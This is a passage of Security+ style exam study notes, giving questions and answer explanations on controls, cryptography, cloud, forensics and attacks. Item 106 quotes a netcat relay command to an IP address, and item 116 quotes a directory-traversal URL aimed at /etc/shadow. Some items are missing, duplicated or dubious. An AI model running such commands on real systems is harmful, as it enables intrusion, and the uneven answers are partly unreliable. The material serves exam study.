assurance that every equivalent string has a unique binary representation. This is necessary because, in
Unicode, the same string can have many different representations. Obfuscation/camouflage is incorrect.
Obfuscation/camouflage and encryption are often used in the software development process to prevent
software from being reverse engineered. These practices protect the trade secrets and intellectual
property of organizations. Stored procedures is incorrect because stored procedures are combinations
of precompiled SQL statements, stored in the database, that execute some task. Automation/scripting is
incorrect because automation/scripting greatly increases an organization’s capability to detect and
respond to threats. It combines machine learning (ML) with automation to respond to threats and
maintain critical operations.
68. Which of the following is an integrated circuit that can be programmed or modified in the
field?
System-on-a-chip (SoC) technology is basically a hardware module in a small form factor. SoCs
can be implemented using a field-programmable gate array (FPGA), which is an integrated circuit that
can be programmed or modified in the field. This provides the ability to make changes even after it’s
been deployed. RTOS is incorrect because a real-time operating system (RTOS) is a small operating
system used in embedded systems and IoT applications that allows applications to run with precise
timing and high reliability. NERC is incorrect because North American Electric Reliability Corporation
(NERC) develops reliability standards that are overseen by the Federal Energy Regulatory Commission
(FERC). UAV is incorrect because a UAV is an unmanned aerial vehicle, such as a drone.
69. As a security analyst, you realize that the security risks associated with geotagging are
unwanted advertising, spying, stalking, and theft. How can you limit these risks?
Geotagging allows location data to be attached to images, videos, SMS messages, and website
postings, providing permanent and searchable data. Geotagging can be limited by turning off features
in social network accounts, disabling location services, and selectively using location features. Enable
GPS tracking is incorrect. Geolocation uses Global Positioning System (GPS) tracking to find the location
of a device. More commonly, employers use this feature to locate employees through their devices.
Implementing geofencing is incorrect. Geofencing takes geolocation a step further and uses GPS
coordinates or radio frequency identification (RFID) to define a geographic perimeter. Disable push
notifications is incorrect. A push notification is a brief message or alert that is sent through an installed
application to the users who opted in for notifications.
70. A fellow security analyst asks you about the flow of network traffic. How would you explain
the north–south network traffic flow concept?
Network traffic between the data center and the outside of the network
71. Rashaad needs to protect hosts in his enterprise environment against known malicious
attacks from the network layer up through the application layer. Which of the following should he
implement to recognize and prevent these attacks?
Host intrusion prevention systems (HIPSs) are a necessity in any enterprise environment. These
systems protect hosts and Prevent known and unknown malicious attacks from the network layer up
through the application layer. HIDS is incorrect. A host intrusion detection system (HIDS) can detect
malicious activity and send alerting messages, but it does not prevent attacks.
72. Organizations that do business with security and cloud service providers should ensure that
these vendors have reports that attest to their practices around confidentiality, integrity, availability.
What are these reports called?
In general terms, an SSAE SOC 2 report is an auditing procedure which ensures that providers
are providing adequate measures to ensure the safety and privacy of your organization’s data and its
customers’ data. Organizations that do business with security service providers, including cloud service
providers, should ensure that each of these vendors has an SOC 2 report, which provides a mechanism
for vendors to communicate their controls externally. There are two variations: Type I, which addresses
controls at a specific point in time, and Type II, which is performed over a minimum period of six
months. SSAE SOC 3 TYPE IV is incorrect as SSAE SOC 3 TYPE IV is not a valid report type.
73. Kitty is a CISO for a large enterprise network with many mobile users. What can she
implement that provides functionality and control over enterprise devices as well as identity and access
management capabilities?
Mobile device management (MDM) provides functionality and control over enterprise devices
by allowing the enrollment of enterprise devices for management functions such as provisioning
devices, tracking inventory, changing configurations, updating, managing applications, and enforcing
policies. Unified endpoint management (UEM) expands on MDM by providing unified capabilities and
also including content and threat management, identity and access management, and application
containerization.
74. Ling just purchased and installed a new SOHO router, complete with WPA3. What does
WPA3 use to prevent offline password attacks?
WPA3 helps prevent offline password attacks by using Simultaneous Authentication of Equals
(SAE). This allows users to choose easier-to-remember passwords and, through forward secrecy, does
not compromise traffic already transmitted even if the password becomes compromised.
75. Developers at your company require a set of practices that combines software development
and IT operations to shorten the software development life cycle. Which of the following is being
described?
DevOps is a group of practices that combines software development (Dev) and information
technology operations (Ops). Its goal is to shorten the software development lifecycle (SDLC) and
provide continuous delivery through quality software.
76. Which statement is false regarding certificate formats?
The certificate format P7B (PKCS#7) uses Base64 ASCII encoding and includes the common
extensions .p7b or .p7c, which are supported by the Windows operating system and Java Tomcat. This
format includes the header BEGIN PKCS7 and the footer END PKCS7; each is preceded and followed by
five dashes. The other answers are incorrect as these are true statements regarding distinguished
encoding rules (DER), privacy enhanced mail (PEM), and personal information exchange (PFX) certificate
formats. For the Security+ exam, you should also know that DER is associated with Java systems, PEM is
associated with Apache web servers, and PFX is associated with Windows systems.
78. Richard wants to use public key cryptography to send an encrypted message to Racheal.
What key does he need to use to encrypt the message?
Richard needs to use Racheal’s public key to encrypt the message. Racheal will then read the
message, using her private key. Richard could sign the message using his private key, and Racheal could
use his public key to ensure that his signature is valid.
79. Which control type includes organizational culture and physical controls that form the outer
line of defense against direct access to data, such as protecting backup media and paying attention to
facility design details?
Operational controls include organizational culture and physical controls that form the outer
line of defense against direct access to data, such as protecting backup media; securing output and
mobile file storage devices; and paying attention to facility design details, including layout, doors,
guards, locks, and surveillance systems. Technical controls are security controls that are executed by
technical systems. Technical controls include logical access control systems, security systems,
encryption, and data classification solutions. Managerial controls (or administrative controls) include
business and organizational processes and procedures, such as security policies and procedures,
personnel background checks, security awareness training, and formal change-management procedures.
The attribute-based access control (ABAC) authorization process is determined by evaluating rules and
policies against attributes associated with an entity, such as the subject, object, operation, or
environment condition.
80. What is a major weakness with heuristic scanning tools that look for instructions or
commands that are not typically found in application programs?
False positives. Heuristic scanning looks for instructions or commands that are not typically
found in application programs. However, these methods are susceptible to false positives and cannot
identify new viruses until the database is updated.
81. Logical access control systems, security systems, encryption, and data classification solutions
are examples of what type of controls?
Technical/logical controls are security controls that are executed by technical systems.
Technical controls include logical access control systems, security systems, encryption, and data
classification solutions. Operational and physical are incorrect because operational/physical controls
include organizational culture and physical controls that form the outer line of defense against direct
access to data, such as protecting backup media; securing output and mobile file storage devices; and
paying attention to facility design details.
82. You work for a bank that is interested in moving some of its operations to the cloud, but it is
worried about security. You recently discovered an organization called CloudBank that was formed by 15
local banks as a way for them to build a secure cloud-based environment that can be accessed by the 15
member banks. Which cloud model BEST describes the cloud created by CloudBank?
Community Cloud is another type of cloud computing in which the setup of the cloud is shared
manually among different organizations that belong to the same community or area. A multi-tenant
setup is developed using cloud among different organizations that belong to a particular community or
group having similar computing concerns. For joint business organizations, ventures, research
organizations, and tenders, a community cloud is an appropriate solution. Based on the description of
15 member banks coming together to create the CloudBank organization and its cloud computing
environment, a community cloud model is most likely being described.
83. Which of the following must be combined with a threat to create risk?
A risk results from the combination of a threat and a vulnerability. A vulnerability is a weakness
in a device, system, application, or process that might allow an attack to take place. A threat is an
outside force that may exploit a vulnerability.
84.
85. Which type of authentication method is commonly used with physical access control
systems and relies upon RFID devices embedded into a token?
A proximity card is a contactless card that usually utilizes RFID to communicate with the reader
on a physical access system. These are commonly used to access secured rooms (such as server rooms)
or even a building itself (such as at a mantrap). Some smart cards contain proximity cards within them,
as well, but the best answer to this question is proximity cards since that is the function the smart card
would be used to meet the requirements of this scenario.
86. Maria is trying to log in to her company's webmail and is asked to enter her username and
password. Which type of authentication method is Maria using?
Single-factor authentication (SFA) is a process for securing access to a given system, such as a
network or website, that identifies the party requesting access through only one category of credentials
(something you know, something you have, something you are, or something you do). The most
common example of single-factor authentication occurs when a user is prompted to enter their
username and password in order to authenticate.
87. The paparazzi have found copies of pictures of a celebrity's new baby online. The celebrity
states they were never publicly released but were uploaded to their cloud provider's automated photo
backup. Which of the following threats was the celebrity MOST likely a victim of?
Unauthorized root access
88. You have been hired to perform a web application security test. During the test, you notice
that the site is dynamic and, therefore, must be using a backend database. You decide you want to test
to determine if the site is susceptible to a SQL injection. What is the first character that you should
attempt to use in breaking a valid SQL request?
The single quote character (') is used because this is the character limiter in SQL. With a single
quote,' you delimit strings, and therefore you can test whether the strings are properly escaped in the
targeted application or not.
89. Your company just launched a new invoicing website for use by your five largest vendors.
You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is
timing out, and the website overall is performing slowly. You have noticed that the website received
three million requests in just 24 hours, and the service has now become unavailable for use. What do
you recommend should be implemented to restore and maintain the availability of the new invoicing
system?
By implementing whitelisting of the authorized IP addresses for the five largest vendors, they
will be the only ones who will be able to access the webserver. This can be done by creating rules in the
Access Control List (ACL) to deny ALL other users except these five vendors, thereby dropping a large
number of requests from any other IP addresses, such as those from an attacker.
90. Dion Training has a $15,000 server that has been crashing frequently. Over the past 12
months, the server has crashed 10 times, requiring the server to be rebooted in order to recover from
the crash. Each time, this has resulted in a 5% loss of functionality or data. Based on this information,
what is the Annual Loss Expectancy (ALE) for this server?
To calculate the ALE, you need to multiple the Single Loss Expectancy (SLE) by the Annual Rate
of Occurrence (ARO). The SLE is calculated by multiplying the Exposure Factor (EF) by the Asset Value
(AV). Therefore, SLE = EF x AV, and ALE = SLE x ARO. For this scenario, the asset value is $15,000, the
annual rate of occurrence is 10 times per year, and the exposure factor is 5% (or 0.05). To calculate the
SLE, SLE = 0.05 x $15,000 = $750. Therefore, the ALE = SLE x ARO = $750 x 10 = $7,500.
91. Dion Training allows its visiting business partners from CompTIA to use an available Ethernet
port in their conference room to establish a VPN connection back to the CompTIA internal network. The
CompTIA employees should be able to obtain internet access from the Ethernet port in the conference
room, but nowhere else in the building. Additionally, if a Dion Training employee uses the same
Ethernet port in the conference room, they should be able to access Dion Training's secure internal
network. Which of the following technologies would allow you to configure this port and support both
requirements?
Network Access Control (NAC) uses a set of protocols to define and implement a policy that
describes how to secure access to network nodes whenever a device initially attempts to access the
network. NAC can utilize an automatic remediation process by fixing non-compliant hosts before
allowing network access. Network Access Control can control access to a network with policies,
including pre-admission endpoint security policy checks and post-admission controls over where users
and devices can go on a network and what they can do. In this scenario, implementing NAC can identify
which machines are known and trusted Dion Training assets, and provide them with access to the secure
internal network. NAC could also determine which are unknown machines (assumed to be those of
CompTIA employees), and provide them with direct internet access only by placing them onto a guest
network or VLAN. While MAC filtering could be used to allow or deny access to the network, it cannot by
itself control which set of network resources could be utilized from a single ethernet port. A security
information and event management (SIEM) system provides real-time analysis of security alerts
generated by applications and network hardware. An access control list could define what ports,
protocols, or IP addresses the ethernet port could be utilized, but it would be unable to distinguish
between a Dion Training employee's laptop and a CompTIA employee's laptop like a NAC
implementation could.
92. Joseph would like to prevent hosts from connecting to known malware distribution domains.
What type of solution should be used without deploying endpoint protection software or an IPS system?
DNS blackholing is a process that uses a list of known domains/IP addresses belonging to
malicious hosts and uses an internal DNS server to create a fake reply.
93. Which of the following types of attacks occurs when an attacker sends unsolicited messages
over Facebook messenger?
Spim is a type of spam targeting users of instant messaging (IM) services, SMS, or private
messages within websites and social media. If the unsolicited messages were sent by email, they would
have instead been classified as Spam.
94. An internet marketing company decided that they didn't want to following the rules for
GDPR because it would create too much work for them. They wanted to buy insurance, but no insurance
company would write them a policy to cover any fines received. They considered how much the fines
might be, and decided to simply ignore the regulation and its requirements. Which of the following risk
strategies did the company choose?
Acceptance.
95. Chris just downloaded a new third-party email client for his smartphone. When Chris
attempts to log in to his email with his username and password, the email client generates an error
messaging stating that "Invalid credentials" were entered. Chris assumes he must have forgotten his
password, so he resets his email's username and password and then reenters them into the email client.
Again, Chris receives an "Invalid credentials" error. What is MOST likely causing the "Invalid credentials"
error in regard to Chris's email client?
If a user or system has configured their email accounts to require two-factor authentication
(2FA) or multifactor authentication, then even if they enter their username and password correctly in
the third-party email client, they will receive the "Invalid credentials" error message.
96. Nicole's organization does not have the budget or staff to conduct 24/7 security monitoring
of their network. To supplement her team, she contracts with a managed SOC service. Which of the
following services or providers would be best suited for this role?
A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS,
and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part
of their core service offerings.
97. If you are unable to ping a target because you are receiving no response or a response that
states the destination is unreachable, then ICMP may be disabled on the remote end. If you wanted to
try to elicit a response from a host using TCP, what tool would you use?
Hping is a handy little utility that assembles and sends custom ICMP, UDP, or TCP packets and
then displays any replies. It was inspired by the ping command but offered far more control over the
probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly
useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the
standard utilities. This often allows you to map out firewall rule sets.
98. Which of the following would NOT be useful in defending against a zero-day threat?
Patching.
99. You have been asked to install a computer in a public workspace. The computer should only
be used by an authorized user. Which of the following security requirements should you implement to
prevent unauthorized users from accessing the network with this computer?
To prevent the computer from being used inadvertently to access the network, the system
should be configured to require authentication whenever the computer is woken up.
100. Which law requires that government agencies and other organizations that operate
systems on behalf of government agencies to comply with security standards?
The Federal Information Security Management Act (FISMA) is a United States federal law that
defines a comprehensive framework to protect government information, operations, and assets against
natural or man-made threats. FISMA requires that government agencies and other organizations that
operate systems on behalf of government agencies comply with security standards.
101. Which of the following is a senior role with the ultimate responsibility for maintaining
confidentiality, integrity, and availability in a system?
A data owner is a person responsible for the confidentiality, integrity, availability, and privacy of
information assets. They are usually senior executives and somebody with authority and responsibility.
102. Keith wants to validate the application file that he downloaded from the vendor of the
application. Which of the following should he compare against the file to verify the integrity of the
downloaded application?
MD5 or SHA1
103. Which type of monitoring would utilize a network tap?
Network taps are devices that allow a copy of network traffic to be captured for analysis. They
conduct passive network monitoring and visibility without interfering with the network traffic itself.
104. Which of the following is the leading cause for cross-site scripting, SQL injection, and XML
injection attacks?
A primary vector for attacking applications is to exploit faulty input validation. The input could
include user data entered into a form or URL, passed by another application or link. This is heavily
exploited by cross-site scripting, SQL injection, and XML injection attacks.
105. Which type of personnel control is being implemented if Kirsten must receive and
inventory any items that her coworker, Bob, orders?
separation of duties
106. An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based
on this command, what will occur?
Netcat will listen on port 8080 and output anything received to a remote connection on
192.168.1.76 port 443
The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port.
Then, the | character allows multiple commands to be run during a single command execution. Next,
netcat is being told to send the data to the given IP (192.168.1.76) over port 443. This is a common
technique to try to bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel).
107. Which of the following type of digital forensic investigations is most challenging due to the
on-demand nature of the assets being analyzed?
Cloud Services.
108. An attacker has compromised a virtualized server. You are conducting forensic analysis as
part of the recovery effort but found that the attacker deleted a virtual machine image as part of their
malicious activity. Which of the following challenges do you now have to overcome as part of the
recovery and remediation efforts?
Due to the deletion of the VM disk image, you will now have to conduct file carving or other
data recovery techniques to recover and remediate the virtualized server. If the server's host uses a
proprietary file system, such as VMFS on ESXi, this can further limit support by data recovery tools. The
attacker may have widely-fragmented the image across the host file system when they deleted the disk
image. VM instances are most useful when they are elastic (meaning they optimally spin up when
needed) and then destroyed without preserving any local data when security has performed the task,
but this can lead to the potential of lost system logs. To prevent this, most VMs also save their logs to an
external syslog server or file. Virtual machine file formats are image-based and written to a mass storage
device. Depending on the configuration and VM state, security must merge any checkpoints to the main
image, using a hypervisor tool, not recovery from an old snapshot, and then roll forward. It is possible to
load VM data into a memory analysis tool, such as Volatility, although the file formats used by some
hypervisors require conversion first, or it may not support the analysis tool.
109. Which party in a federation provides services to members of the federation?
Relying parties (RPs) provide services to members of a federation.
110. Which analysis framework makes no allowance for an adversary retreat in its analysis?
Lockheed Martin cyber kill chain
111. You have been asked to write a new security policy to reduce the risk of employees
working together to steal information from the Dion Training corporate network. Which of the following
policies should you create to counter this threat?
A mandatory vacation policy
112. Dion Training has an open wireless network called "InstructorDemos" for its instructors to
use during class, but they do not want any students connecting to this wireless network. The instructors
need the "InstructorDemos" network to remain open since some of their IoT devices used during course
demonstrations do not support encryption. Based on the requirements provided, which of the following
configuration settings should you use to satisfy the instructor's requirements and prevent students from
using the "InstructorDemos" network?
Since the instructors need to keep the wireless network open, the BEST option is to implement
MAC filtering to prevent the students from connecting to the network while still keeping the network
open. Since the instructors would most likely use the same devices to connect to the network, it would
be relatively easy to implement a MAC filtering based whitelist of devices that are allowed to use the
open network and reject any other devices not listed by the instructors (like the student's laptops or
phones). Reducing the signal strength would not solve this issue since students and instructors are both
in the same classrooms. Using Network Address Translation and Quality of Service will not prevent the
students from accessing or using the open network.
113. Dion Training is building a new data center. The group designing the facility has decided to
provide additional HVAC capacity to ensure the data center maintains a consistently low temperature.
Which of the following is the most likely benefit that will be achieved by increasing the designed HVAC
capacity?
Longer MTBF of hardware due to lower operating temperatures
114. A financial services company wants to donate some old hard drives from their servers to a
local charity, but they are concerned about the possibility of residual data being left on the drives.
Which of the following secure disposal methods would you recommend the company use?
In a cryptographic erase (CE), the storage media is encrypted by default. The encryption key
itself is destroyed during the erasing operation. CE is a feature of self-encrypting drives (SED) and is
often used with solid-state devices. Cryptographic erase can be used with hard drives, as well.
115. Which of the following is not normally part of an endpoint security suite?
Endpoint security includes software host-based firewalls, host-based intrusion protection systems
(HIPS), and anti-virus software. A VPN is not typically considered an endpoint security tool because it is
a network security tool.
116. A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL,
http://test.diontraining.com/../../../../etc/shadow. What type of attack has likely occurred?
This is an example of a directory traversal. A directory traversal attack aims to access files and
directories that are stored outside the webroot folder.
117. When your credit card data is written to the customer invoicing system at Dion Training, the first 12
digits are replaced with an x before storing the data. Which of the following privacy methods is being
used?
Data masking can mean that all or part of the contents of a field is redacted, by substituting all
character strings with x, for example.
118. Kurt believes that his directory server is under attack. He notices unauthorized queries and even
password changes. What type of attack is most likely occurring in this scenario?
An LDAP injection attack is similar to SQL injection, but instead, malicious input is applied to a directory
server, which may result in unauthorized queries, granting of permissions, and even password changes.
119. Which system provides authentication and access control in an enterprise network using UDP
transport to a central network access server?
The Remote Authentication Dial-In User Service (RADIUS) remote access control system provides
authentication and access control in an enterprise network using UDP transport to a central network
access server. In turn, this provides credentials for client access to resources within the extended
enterprise.
120. NAC focuses on controlling access to the network based on the compliance of connecting devices,
ensuring that only secure and authorized devices can join the network. On the other hand, ACL is
concerned with regulating the flow of network traffic based on predefined rules, specifying which
packets are allowed or denied based on criteria like source/destination addresses and ports.
121. A security analyst conducts a Nmap scan of a server and found that port 25 is open. What risk
might this server be exposed to?
Open Mail Relay. Port 25 is the default port for SMTP (Simple Message Transfer Protocol), which is
used for sending an email. An active mail relay occurs when an SMTP server is configured in such a way
that it allows anyone on the Internet to send email through it, not just mail originating from your known
and trusted users. Spammers can exploit this type of vulnerability to use your email server for their
benefit. File/print sharing usually operates over ports 135, 139, and 445 on a Windows server. Web
portals run on ports 80 and 443. Clear text authentication could occur using an unencrypted service,
such as telnet (23), FTP (20/21), or the web (80).
122. Which of the following is not normally part of an endpoint security suite?
Endpoint security includes software host-based firewalls, host-based intrusion protection systems
(HIPS), and anti-virus software. A VPN is not typically considered an endpoint security tool because it is
a network security tool.
123. A cybersecurity analyst has determined that an attack has occurred against your company’s
network. Fortunately, your company uses a good logging system with a centralized Syslog server, so all
the logs are available, collected, and stored properly. According to the cybersecurity analyst, the logs
indicate that the database server was the only company server on the network that appears to have
been attacked. The network is a critical production network for your organization. Therefore, you have
been asked to choose the LEAST disruptive actions on the network while performing the appropriate
incident response actions. Which actions do you recommend as part of the response efforts?
Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the
affected server, and maintain the chain of custody
124. Dion Training is currently undergoing an audit of its information systems. The auditor wants to
understand better how the PII data from a particular database is used within business operations. Which
of the following employees should the auditor interview?
The primary role of the data protection officer (DPO) is to ensure that her organization processes the
personal data of its staff, customers, providers, or any other individuals (also referred to as data
subjects) in compliance with the applicable data protection rules. They must understand how any
privacy information is used within business operations. Therefore, they are the best person for the
auditor to interview to get a complete picture of the data usage.
125. An attacker uses the nslookup interactive mode to locate information on a Domain Name Service
(DNS). What command should they type to request the appropriate records for only the name servers?
The nslookup command is used to query the Domain Name System to obtain the mapping between a
domain name and an IP address or to view other DNS records. The "set type=ns" tells nslookup only
reports information on name servers. If you used "set type=mx" instead, you would receive information
only about mail exchange servers.
126. During an assessment of the POS terminals that accept credit cards, a cybersecurity analyst notices
a recent Windows operating system vulnerability exists on every terminal. Since these systems are all
embedded and require a manufacturer update, the analyst cannot install Microsoft's regular patch.
Which of the following options would be best to ensure the system remains protected and are
compliant with the rules outlined by the PCI DSS?
Since the analyst cannot remediate the vulnerabilities by installing a patch, the next best action would
be to implement some compensating controls. If a vulnerability exists that cannot be patched,
compensating controls can mitigate the risk. Additionally, the analyst should document the current
situation to achieve compliance with PCI DSS.
127. What sanitization technique uses only logical techniques to remove data, such as overwriting a
hard drive with a random series of ones and zeroes?
Clear applies logical techniques to sanitize data in all user-addressable storage locations for protection
against simple non-invasive data recovery techniques. Clearing involves overwriting data once (and
seldom more than three times) with repetitive data (such as all zeros) or resetting a device to factory
settings.
128. Which of the following hashing algorithms results in a 160-bit fixed output?
RIPEMD creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. NTLM creates a 128-bit
fixed output. MD-5 creates a 128-bit fixed output.
129. Which analysis framework provides a graphical depiction of the attacker's approach relative to a kill
chain?
The Diamond Model provides an excellent methodology for communicating cyber events and allowing
analysts to derive mitigation strategies implicitly. The Diamond Model is constructed around a graphical
representation of an attacker's behavior. The MITRE ATT&CK framework provides explicit pseudo-code
examples for detecting or mitigating a given threat within a network and ties specific behaviors back to
individual actors. The Lockheed Martin cyber kill chain provides a general life cycle description of how
attacks occur but does not deal with the specifics of how to mitigate them. OpenIOC contains a depth of
research on APTs but does not integrate the detection and mitigation strategy.
130. Which protocol relies on mutual authentication of the client and the server for its security?
The Lightweight Directory Access Protocol (LDAP) uses a client-server model for mutual authentication.
LDAP is used to enable access to a directory of resources (workstations, users, information, etc.). TLS
provides mutual authentication between clients and servers. Since Secure LDAP (LDAPS) uses TLS, it
provides mutual authentication.
131. You have been hired as a cybersecurity analyst for a privately-owned bank. Which of the following
regulations would have the greatest impact on your bank's cybersecurity program?
The Gramm-Leach-Bliley Act (GLBA) is a United States federal law that requires financial institutions to
explain how they share and protect their customers’ private information.
132. Which of the following techniques would be the most appropriate solution to implementing a
multi-factor authentication system?
Smartcard and PIN
133. Your company just launched a new invoicing website for use by your five largest vendors. You are
the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out,
and the website overall is performing slowly. You have noticed that the website received three million
requests in just 24 hours, and the service has now become unavailable for use. What do you
recommend should be implemented to restore and maintain the availability of the new invoicing
system?
By implementing an allow list of the authorized IP addresses for the five largest vendors, they will be the
only ones who can access the webserver. This can be done by creating rules in the Access Control List
(ACL) to deny ALL other users except these five vendors, thereby dropping a large number of requests
from any other IP addresses, such as those from an attacker.
134. Why would a company want to utilize a wildcard certificate for their servers?
A wildcard certificate is a public key certificate that can be used with multiple subdomains of a domain.
This saves money and reduces the management burden of managing multiple certificates, one for each
subdomain. A single wildcard certificate for *.diontraining.com will secure all these domains
(www.diontraining.com, mail.diontraining.com, ftp.diontraining.com, etc.).
134. You suspect that your server has been the victim of a web-based attack. Which of the following
ports would most likely be seen in the logs to indicate the attack's target?
Web-based attacks would likely appear on port 80 (HTTP) or port 443 (HTTPS). An attack against Active
Directory is likely to be observed on port 389 LDAP. An attack on an FTP server is likely to be observed
on port 21 (FTP). An attack using the remote desktop protocol would be observed on port 3389 (RDP).
135. You are trying to select the best device to install to proactively stop outside attackers from reaching
your internal network. Which of the following devices would be the BEST for you to select?
An intrusion prevention system (IPS) is a form of network security that detects and prevents identified
threats. Intrusion prevention systems continuously monitor your network, looking for possible malicious
incidents, and capturing information about them. An IPS can block malicious network traffic
136. Which of the following categories would contain information about a French citizen's race or ethnic
origin?
According to the GDPR, information about an individual's race or ethnic origin is classified as Sensitive
Personal Information (SPI). Sensitive personal information (SPI) is information about a subject's
opinions, beliefs, and nature afforded specially protected status by privacy legislation.
137. Which of the following types of data breaches would require that the US Department of Health and
Human Services and the media be notified if more than 500 individuals are affected by a data breach?
Protected health information (PHI) is defined as any information that identifies someone as the subject
of medical and insurance records, plus their associated hospital and laboratory test results.
138. A cybersecurity analyst has deployed a custom DLP signature to alert on any files that contain
numbers in the format of a social security number (xxx-xx-xxxx). Which of the following concepts within
DLP is being utilized?
An exact data match (EDM) is a pattern matching technique that uses a structured database of string
values to detect matches.
139. Windows file servers commonly hold sensitive files, databases, passwords, and more. What
common vulnerability is usually used against a Windows file server to expose sensitive files, databases,
and passwords?
Missing patches are the most common vulnerability found on both Windows and Linux systems. When a
security patch is released, attackers begin to reverse engineer the security patch to exploit the
vulnerability. If your servers are not patched against the vulnerability, they can become victims of the
exploit, and the server's data can become compromised.
140. Your company is making a significant investment in infrastructure-as-a-service (IaaS) hosting to
replace its data centers. Which of the following techniques should be used to mitigate the risk of data
remanence when moving virtual hosts from one server to another in the cloud?
To mitigate the risk of data remanence, you should implement full disk encryption. This method will
ensure that all data is encrypted and cannot be exposed to other organizations or the underlying IaaS
provider.
141. select four security features that you should use to best protect your servers in the data center.
This can include physical, logical, or administrative protections.
The best option based on your choices is FM-200, Biometric locks, Mantrap, and Antivirus.
142. A supplier needs to connect several laptops to an organization’s network as part of their service
agreement. These laptops will be operated and maintained by the supplier. Victor, a cybersecurity
analyst for the organization, is concerned that these laptops could contain some vulnerabilities that
could weaken the network's security posture. What can Victor do to mitigate the risk to other devices on
the network without having direct administrative access to the supplier’s laptops?
A jumpbox is a system on a network used to access and manage devices in a separate security zone. This
would create network segmentation between the supplier's laptops and the rest of the network to
minimize the risk. A jump-box system is a hardened and monitored device that spans two dissimilar
security zones and provides a controlled means of access between them.
143. Which of the following types of access control provides the strongest level of protection?
Mandatory Access Control (MAC) requires all access to be predefined based on system classification,
configuration, and authentication. MAC is commonly used in highly centralized environments and
usually relies on a series of labels, such as classification levels of the data.
144. Which type of method is used to collect information during the passive reconnaissance?
Reviewing public repositories. Passive reconnaissance focuses on collecting information that is widely
and openly available from publicly available sources.
145. What is key escrow?
Key escrow is used for third-party access and custody of a private key. Key escrow occurs when a CA or
another entity, such as a third party, maintains a copy of the private key associated with the public key
signed by the CA. This allows the CA or escrow agent to have access to all information encrypted using
the public key from a user’s certificate and to create digital signatures on behalf of the user.
146. Frank and John have started a secret club together. They want to ensure that when they send
messages to each other, they are truly unbreakable. What encryption key would provide the
STRONGEST and MOST secure encryption?
Randomized one-time use pad
147. You are creating a script to filter some logs so that you can detect any suspected malware
beaconing. Which of the following is NOT a typical means of identifying a malware beacons behavior on
the network?
The beacon's protocol is not typically a means of identifying a malware beacon.
148. Which operating system feature is designed to detect malware that is loaded early in the system
startup process or before the operating system can load itself?
Measured boot is a feature where a log of all boot actions is taken and stored in a trusted platform
module for later retrieval and analysis by anti-malware software on a remote server.
149. You have recently been hired as a security analyst at Dion Training. On your first day, your
supervisor begins to explain the way their network is configured, showing you the physical and logical
placement of each firewall, IDS sensor, host-based IPS installations, the networked spam filter, and the
DMZ. What best describes how these various devices are placed into the network for the highest level of
security?
Defense in depth is the concept of layering various network appliances and configurations to create a
more secure and defensible architecture.
150. You are in the recovery steps of an incident response. Throughout the incident, your team never
successfully determined the root cause of the network compromise. Which of the following options
would you LEAST likely perform as part of your recovery and remediation actions?
The only option that is not considered a hardening action is to proactively sanitize and reimage your
routers and switches. If you performed this action, you could have unwanted disruptive effects on the
company.
151. Which term is used in software development to refer to the method in which app and platform
updates are committed to a production environment rapidly?
Continuous deployment is a software development method in which app and platform updates are
committed to production rapidly.
152. During your annual cybersecurity awareness training in your company, the instructor states that
employees should be careful as to what information they post on social media. According to the
instructor, if you post too much personal information on social media, such as your name, birthday,
hometown, and other personal details, it is much easier for an attacker to conduct which type of attack
in order to break your passwords?
A cognitive password is a form of knowledge-based authentication that requires a user to answer a
question, presumably something they intrinsically know, to verify their identity. If you post a lot of
personal information about yourself online, then this type of password can easily be bypassed.
153. Which of the following technologies is NOT a shared authentication protocol?
LDAP can be used for single sign-on but is not a shared authentication protocol.
154. You are working as part of the server team for an online retail store. Due to the upcoming holidays,
your boss is worried that the current servers may not be able to handle the increased demand during a
big sale. Which of the following cloud computing concepts can quickly allow services to scale upward
during busy periods and scale down during slower periods based on the changing user demand?
In cloud computing, the term rapid elasticity is used to describe the scalable provisioning or the
capability to provide scalable cloud computing services. Rapid elasticity is very critical to meet the
fluctuating demands of cloud users. The downside of rapid elasticity implementations is that they can
put a significant load on the system due to the high number of resource allocation and deallocation
requests.
155. You are working as part of a cyber incident response team. An ongoing attack has been identified
on your webserver. Your company wants to take legal action against the criminals who have hacked
your server, so they have brought in a forensic analyst from the FBI to collect the evidence from the
server. What order should the digital evidence be collected based on the order of volatility
The correct order for evidence collection based on the order of volatility is the Processor Cache,
Random Access Memory, Swap File , and then the Hard Drive or USB Drive.
156. Which of the following is the most important feature to consider when designing a system on a
chip?
This makes the savings of space and power the most important feature to consider when designing a
system on a chip.
157. You want to create a new mobile application and develop it in the cloud. You just signed up for a
cloud-based service provider's offering to allow you to develop it using their programming environment.
Which of the following best describes which type of service you have just purchased?
Platform as a Service (PaaS) provides the end-user with a development environment without all the
hassle of configuring and installing it themselves. If you want to develop a customized or specialized
program, PaaS helps reduce the development time and overall costs by providing a ready to use
platform.
158. You are conducting an incident response and have traced the source of the attack to some
compromised user credentials. After performing log analysis, you discover that the attack was
successfully authenticated from an unauthorized foreign country. Your management is now asking for
you to implement a solution to help mitigate this type of attack from occurring again. Which of the
following should you implement?
Context-based authentication can take a number of factors into consideration before permitting access
to a user, including their location (e.g., country, GPS location, etc.), the time of day, and other key
factors to minimize the threat of compromised credentials from being utilized by an attacker.
159. During which incident response phase is the preservation of evidence performed?
A cybersecurity analyst must preserve evidence during the containment, eradication, and recovery
phase.
160. Which of the following does a User Agent request a resource from when conducting a SAML
transaction?
SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a
service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the identity
of a user (the principal) can be trusted by the SP without the user having to authenticate directly with
the SP.
161. Which of the following authentication mechanisms involves receiving a one-time use shared secret
password, usually through a token-based key fob or smartphone app, that does not expire?
HOTP
162. A username and password is used as part of the Password Authentication Protocol (PAP)
authentication system.
163. A cybersecurity analyst from BigCorp contacts your company to notify them that several of your
computers were seen attempting to create a denial of service condition against their servers. They
